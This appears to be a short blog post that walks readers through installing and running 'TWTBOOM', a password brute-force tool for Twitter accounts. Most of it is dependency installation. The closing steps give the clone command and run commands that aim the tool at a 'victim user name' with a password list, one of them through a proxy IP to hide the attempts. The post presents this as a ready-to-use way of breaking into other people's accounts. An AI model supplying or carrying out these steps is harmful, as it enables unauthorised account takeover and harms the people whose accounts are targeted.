Requirement’s
- Android version 5.0 and above
- Termux application
- Git package
- Python package
- Mechanize module
- Requests module
Tested platform
- Windows
- Linux
- Android~Termux
- MacOs
How to install git package?
sudo apt install git
Termux
pkg install git
What is git package?
Git is a distributed version-control system for tracking changes in source code during software development. It is designed for coordinating work among programmers, but it can be used to track changes in any set of files.
How to install python package?
sudo apt install python && sudo apt install python2
Termux
pkg install python && pkg install python2
What is requests?
The requests module allows you to send HTTP requests using Python. The HTTP request returns a Response Object with all the response data (content, encoding, status, etc).
pip install requests
pip install requests
What is mechanize?
The mechanize module in Python is similar to perl WWW:Mechanize. It gives you a browser like object to interact with web pages.
pip install mechanize
pip install mechanize
How to download and install twtboom Tool
Step 1:
git clone https://github.com/Oseid/TWTBOOM.git
Step 2:
cd TWTBOOM
Step 3:
chmod +x twtboom.py
Step 4:
python twtboom.py -t (victim user name) -w ( your password list)
If you need to Brute Force On twitter Account With Proxy(HTTP/s) just type this blow command on your termux or linux terminal.
python twtboom.py -t ( victim user name) -w wlist.txt -p 35.236.37.121
Post a Comment